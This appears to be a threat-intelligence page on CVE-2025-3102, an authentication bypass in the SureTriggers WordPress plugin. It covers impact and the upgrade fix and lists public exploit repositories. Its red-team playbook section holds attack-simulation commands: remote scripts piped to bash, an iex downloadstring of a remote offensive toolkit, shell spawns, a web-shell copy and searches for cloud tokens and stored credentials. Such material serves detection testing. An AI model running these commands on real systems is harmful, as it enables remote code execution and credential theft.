CVE-2025-3102
Overview
This vulnerability is an authentication bypass caused by the absence of a validation check for empty 'secret_key' values within the 'autheticate_user' function of the SureTriggers plugin. The flaw resides in the authentication logic of the WordPress plugin component, specifically affecting versions up to and including 1.0.78. The missing empty value check allows the authentication mechanism to be circumvented when no API key is configured.
Vulnerability Description
The SureTriggers: All-in-One Automation Platform plugin for WordPress is vulnerable to an authentication bypass leading to administrative account creation due to a missing empty value check on the 'secret_key' value in the 'autheticate_user' function in all versions up to, and including, 1.0.78. This makes it possible for unauthenticated attackers to create administrator accounts on the target website when the plugin is installed and activated but not configured with an API key.
Impact
An unauthenticated attacker can exploit this flaw to create new administrator accounts on the affected WordPress site, gaining full administrative privileges without prior authentication. This requires only that the plugin be installed and activated without an API key configured, with no user interaction or valid credentials needed. Such access enables complete control over the website, including data modification, user management, and potential lateral movement. The CVSS vector (AV:N/AC:H/PR:N/UI:N) indicates network attack with high complexity but no privileges or user interaction required.
Solution
Users should upgrade the SureTriggers plugin to a version later than 1.0.78 where this vulnerability is addressed. Detailed patch information and updates are available through the WordPress plugin repository and the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/ec017311-f150-4a14-a4b4-b5634f574e2b. Reviewing the plugin’s changelog and applying the latest stable release is recommended to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the SureTriggers: All-in-One Automation Platform plugin for WordPress stems from an authentication bypass due to a flaw in the 'authenticate_user' function. Specifically, the absence of a check for an empty value in the 'secret_key' parameter allows unauthenticated attackers to exploit this oversight. When the plugin is installed and activated without a configured API key, the function fails to validate the authenticity of requests properly. This oversight creates a significant security gap, enabling malicious actors to create administrative accounts on the affected WordPress sites, thereby gaining full control over the website's backend.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage automated scripts or manual requests to the vulnerable endpoint, bypassing any authentication mechanisms that would typically protect administrative functions. Once an attacker successfully creates an administrative account, they can manipulate site content, install additional malicious plugins, exfiltrate sensitive user data, or even deface the website. Given the widespread use of WordPress and the popularity of the SureTriggers plugin, the potential for exploitation is extensive, especially if the plugin is deployed in environments where security practices are lax or where users are unaware of the risks associated with unconfigured plugins.
The real-world impact of this vulnerability can be profound, particularly for businesses that rely on their online presence for revenue generation and customer engagement. An attacker gaining administrative access can lead to data breaches, loss of customer trust, and significant financial repercussions. The implications extend beyond immediate financial loss; they can also result in long-term damage to a brand's reputation and potential legal ramifications due to non-compliance with data protection regulations. Furthermore, the ease of exploitation means that even organizations with limited cybersecurity resources could find themselves targeted, amplifying the risk landscape for small and medium-sized enterprises.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and vulnerability assessments should be conducted to identify outdated or misconfigured plugins. Employing a web application firewall (WAF) can help filter out malicious requests and provide an additional layer of security. Furthermore, organizations should ensure that all plugins, including the SureTriggers plugin, are updated to the latest versions, as developers often release patches to address such vulnerabilities. Educating users about the importance of configuring API keys and other security settings can also reduce the risk of exploitation. In addition, monitoring user account creation and access logs can help detect unusual activity that may indicate an attempted exploitation of this vulnerability.
In conclusion, the authentication bypass vulnerability in the SureTriggers plugin presents a serious risk to WordPress installations. The ease of exploitation combined with the potential for significant impact makes it imperative for organizations to take proactive steps to secure their web applications. By understanding the technical details, recognizing the attack vectors, assessing the real-world implications, and implementing robust detection and mitigation strategies, businesses can better protect themselves against this and similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the SureTriggers plugin vulnerability, with our telemetry indicating a notable surge in detection activity. This increase aligns with a slight uptick in the EPSS score, reflecting growing attacker interest and potential exploitation in the wild. Concurrently, new proof-of-concept exploits have emerged across multiple public repositories, broadening the accessibility of attack tools for less skilled adversaries. The proliferation of these exploits significantly lowers the barrier to entry for threat actors, thereby amplifying the risk of unauthorized administrative account creation on vulnerable WordPress installations. This evolving landscape underscores an elevated threat level, as the combination of increased exploitation attempts and expanded exploit availability enhances the likelihood of successful compromise. Defenders should recognize this shift as an indicator of heightened adversary focus and operational momentum surrounding CVE-2025-3102, necessitating increased vigilance in detection and response efforts.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress SureTriggers (aka OttoKit) Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)
exploits/multi/http/wp_suretriggers_auth_bypass
|
Michael Mazzolini (mikemyers), Denver Jackson, Khaled Alenazi (Nxploited) +1 | Unknown | - | View |
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Nxploited/CVE-2025-3102
Wordpress SureTriggers <= 1.0.78 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Administrati...
|
Nxploited | 8 | 4 | 2025-04-14 | View |
|
itsismarcos/vanda-CVE-2025-3102
EXPLOIT CVE-2025-3102
|
itsismarcos | 3 | 0 | 2025-04-12 | View |
|
SUPRAAA-1337/CVE-2025-3102-exploit
Exploitation of an authorization bypass vulnerability in the SureTriggers plugin for WordPress versions <= 1.0.78, allow...
|
SUPRAAA-1337 | 1 | 1 | 2025-04-25 | View |
|
rhz0d/CVE-2025-3102
Wordpress SureTriggers <= 1.0.78 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Administrati...
|
rhz0d | 2 | 0 | 2025-04-14 | View |
|
0xgh057r3c0n/CVE-2025-3102
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
|
0xgh057r3c0n | 0 | 1 | 2025-06-03 | View |
|
dennisec/CVE-2025-3102
|
dennisec | 0 | 0 | 2025-04-20 | View |
|
SUPRAAA-1337/CVE-2025-3102_v2
Checks the SureTriggers WordPress plugin's readme.txt file for the Stable tag version. If the version is less than or eq...
|
SUPRAAA-1337 | 0 | 0 | 2025-04-25 | View |
|
baribut/CVE-2025-3102
The SureTriggers WordPress plugin contains a critical authentication bypass vulnerability (CVE-2025-3102) that affects a...
|
baribut | 0 | 0 | 2025-06-06 | View |
|
SUPRAAA-1337/CVE-2025-3102
Detects the version of the SureTriggers WordPress plugin from exposed asset URLs and compares it to determine if it's vu...
|
SUPRAAA-1337 | 0 | 0 | 2025-04-25 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-3102 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/ec017311-f150-4a14-a4b4-b5634f574e2b?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/suretriggers/trunk/src/Controllers/RestController.php#L59 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3266499%40suretriggers%2Ftrunk&old=3264905%40suretriggers%2Ftrunk&sfp_email=&sfph_mail= |